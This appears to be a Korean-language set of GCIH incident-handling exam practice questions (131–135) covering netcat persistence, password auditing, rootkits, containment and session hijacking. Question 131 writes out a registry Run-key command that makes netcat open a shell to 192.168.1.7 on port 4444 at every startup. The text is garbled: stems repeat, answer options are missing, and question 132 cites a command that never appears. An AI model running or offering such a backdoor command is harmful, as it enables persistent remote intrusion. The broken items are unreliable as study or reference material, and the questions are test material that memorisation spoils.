GCIH 문제 131
원격 Windows Server 2003 컴퓨터에서 다음 명령을 실행합니다.
c:\reg 추가 HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
이 명령을 실행하여 어떤 작업을 수행하시겠습니까?
각 정답은 완전한 솔루션을 나타냅니다. 해당하는 항목을 모두 선택하십시오.
c:\reg 추가 HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
이 명령을 실행하여 어떤 작업을 수행하시겠습니까?
각 정답은 완전한 솔루션을 나타냅니다. 해당하는 항목을 모두 선택하십시오.
GCIH 문제 132
Adam은 Umbrella Inc.의 보안 관리자로 일하고 있습니다. 암호 정책을 포함하여 회사의 보안 정책을 강화하기 위한 프로젝트가 그에게 할당되었습니다. 그러나 일부 오래된 응용 프로그램으로 인해 Adam은 Active Directory에서 최소한의 암호 그룹 정책만 적용할 수 있습니다.
10자. 그는 회사 직원들에게 새 비밀번호 정책에 따라 모든 사람이 최소 14자의 복잡한 비밀번호를 사용해야 한다고 알렸습니다. Adam은 모든 사람이 새로운 보안 정책 요구 사항을 충족하는 복잡한 암호를 사용하고 있는지 확인하려고 합니다. 그는 네트워크의 도메인 컨트롤러 중 하나에 로그온하고 다음 명령을 실행합니다.
이 명령은 다음 중 어떤 작업을 수행합니까?
10자. 그는 회사 직원들에게 새 비밀번호 정책에 따라 모든 사람이 최소 14자의 복잡한 비밀번호를 사용해야 한다고 알렸습니다. Adam은 모든 사람이 새로운 보안 정책 요구 사항을 충족하는 복잡한 암호를 사용하고 있는지 확인하려고 합니다. 그는 네트워크의 도메인 컨트롤러 중 하나에 로그온하고 다음 명령을 실행합니다.
이 명령은 다음 중 어떤 작업을 수행합니까?
GCIH 문제 133
다음 루트킷 중 커널 및 관련 장치 드라이버를 포함하여 운영 체제의 일부를 대체하거나 추가 코드를 추가하는 루트킷은 무엇입니까?
GCIH 문제 134
Adam은 Umbrella Inc.의 사고 처리자로 일하고 있습니다. 그는 사고 대응 팀 구성원을 교육하기 위해 캘리포니아 부서로 파견되었습니다. 데모 프로젝트로서 그는 사고 대응 팀 구성원에게 다음 작업을 수행하도록 요청했습니다.
* 네트워크 케이블 와이어를 제거하십시오.
* 별도의 VLAN에서 시스템 분리
* 방화벽 또는 액세스 목록을 사용하여 시스템 안팎으로의 통신을 방지하십시오.
* 손상된 시스템에서 트래픽을 유도하도록 DNS 항목 변경
사고 처리 프로세스의 다음 단계 중 위의 조치가 포함되는 것은 무엇입니까?
* 네트워크 케이블 와이어를 제거하십시오.
* 별도의 VLAN에서 시스템 분리
* 방화벽 또는 액세스 목록을 사용하여 시스템 안팎으로의 통신을 방지하십시오.
* 손상된 시스템에서 트래픽을 유도하도록 DNS 항목 변경
사고 처리 프로세스의 다음 단계 중 위의 조치가 포함되는 것은 무엇입니까?
GCIH 문제 135
다음 중 공격자가 패킷 스니핑을 사용하여 세션 쿠키를 훔치기 위해 두 당사자 간의 네트워크 트래픽을 읽는 공격은 무엇입니까?